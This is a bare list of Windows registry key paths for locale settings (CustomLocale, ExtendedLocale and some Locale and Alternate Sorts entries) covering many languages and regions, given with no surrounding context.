HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fy-NL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fy-NL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ps
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ps
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ps-AF
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ps-AF
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fil
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fil
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fil-PH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fil-PH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\dv
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\dv
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\dv-MV
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\dv-MV
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ha
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ha
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ha-Latn-NG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ha-Latn-NG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\yo
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\yo
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\yo-NG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\yo-NG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\quz
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\quz
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\quz-BO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\quz-BO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\nso
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\nso
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\nso-ZA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\nso-ZA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ba
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ba
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ba-RU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ba-RU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\lb
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\lb
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\lb-LU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\lb-LU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\kl
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\kl
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\kl-GL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\kl-GL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ig
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ig
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ig-NG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ig-NG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ii
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ii
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ii-CN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ii-CN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\arn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\arn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\arn-CL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\arn-CL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\moh
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\moh
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\moh-CA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\moh-CA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\br
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\br
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\br-FR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\br-FR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ug
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ug
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ug-CN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ug-CN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\mi
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\mi
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\mi-NZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\mi-NZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\oc
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\oc
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\oc-FR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\oc-FR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\co
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\co
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\co-FR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\co-FR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\gsw
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\gsw
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\gsw-FR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\gsw-FR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sah
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sah
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sah-RU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sah-RU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\qut
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\qut
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\qut-GT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\qut-GT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\rw
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\rw
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\rw-RW
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\rw-RW
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\wo
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\wo
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\wo-SN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\wo-SN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\prs
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\prs
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\prs-AF
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\prs-AF
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\gd
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\gd
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\gd-GB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\gd-GB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\zh-TW
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\zh-TW
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es-ES_tradnl
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es-ES_tradnl
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\iu-Cans-CA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\iu-Cans-CA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\qps-ploc
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\qps-ploc
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\00000501
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts\00000501
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\qps-ploca
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\qps-ploca
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\000005FE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts\000005FE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-IQ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-IQ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\de-CH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\de-CH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-GB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es-MX
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es-MX
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr-BE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr-BE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\it-CH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\it-CH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\nl-BE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\nl-BE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\nn-NO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\nn-NO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\pt-PT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\pt-PT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sr-Latn-CS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sr-Latn-CS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sv-FI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sv-FI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\az-Cyrl-AZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\az-Cyrl-AZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\dsb-DE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\dsb-DE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\se-SE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\se-SE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ms-BN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ms-BN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\uz-Cyrl-UZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\uz-Cyrl-UZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\bn-BD
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\bn-BD
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\mn-Mong-CN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\mn-Mong-CN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\quz-EC
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\quz-EC
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\qps-plocm
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\qps-plocm
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\000009FF
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts\000009FF
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-EG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-EG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\zh-HK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\zh-HK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\de-AT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\de-AT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-AU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-AU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr-CA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr-CA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sr-Cyrl-CS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sr-Cyrl-CS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\se-FI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\se-FI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\quz-PE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\quz-PE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-LY
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-LY
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\zh-SG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\zh-SG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\de-LU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\de-LU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-CA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-CA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es-GT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es-GT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr-CH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr-CH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\hr-BA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\hr-BA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\smj-NO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\smj-NO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-DZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-DZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\zh-MO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\zh-MO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\de-LI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\de-LI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-NZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-NZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es-CR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es-CR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr-LU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr-LU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\bs-Latn-BA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\bs-Latn-BA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\smj-SE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\smj-SE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-MA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-MA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-IE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-IE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es-PA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es-PA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr-MC
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr-MC
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sr-Latn-BA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sr-Latn-BA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sma-NO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sma-NO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-TN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-TN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-ZA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-ZA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es-DO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es-DO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sr-Cyrl-BA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sr-Cyrl-BA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sma-SE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sma-SE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-OM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-OM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-JM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-JM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es-VE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es-VE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\bs-Cyrl-BA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\bs-Cyrl-BA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sms-FI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sms-FI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-YE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-YE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-029
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-029
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es-CO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es-CO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sr-Latn-RS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sr-Latn-RS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\smn-FI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\smn-FI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-SY
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-SY
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-BZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-BZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es-PE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es-PE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sr-Cyrl-RS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sr-Cyrl-RS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-JO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-JO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-TT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-TT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es-AR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es-AR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sr-Latn-ME
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sr-Latn-ME
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-LB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-LB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-ZW
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-ZW
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es-EC
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es-EC
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sr-Cyrl-ME
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sr-Cyrl-ME
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-KW
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-KW
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-PH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-PH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es-CL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es-CL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-AE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-AE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es-UY
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es-UY
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-BH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-BH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es-PY
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es-PY
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-QA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-QA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es-BO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es-BO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-MY
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-MY
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es-SV
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es-SV
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-SG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-SG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es-HN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es-HN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es-NI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es-NI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es-PR
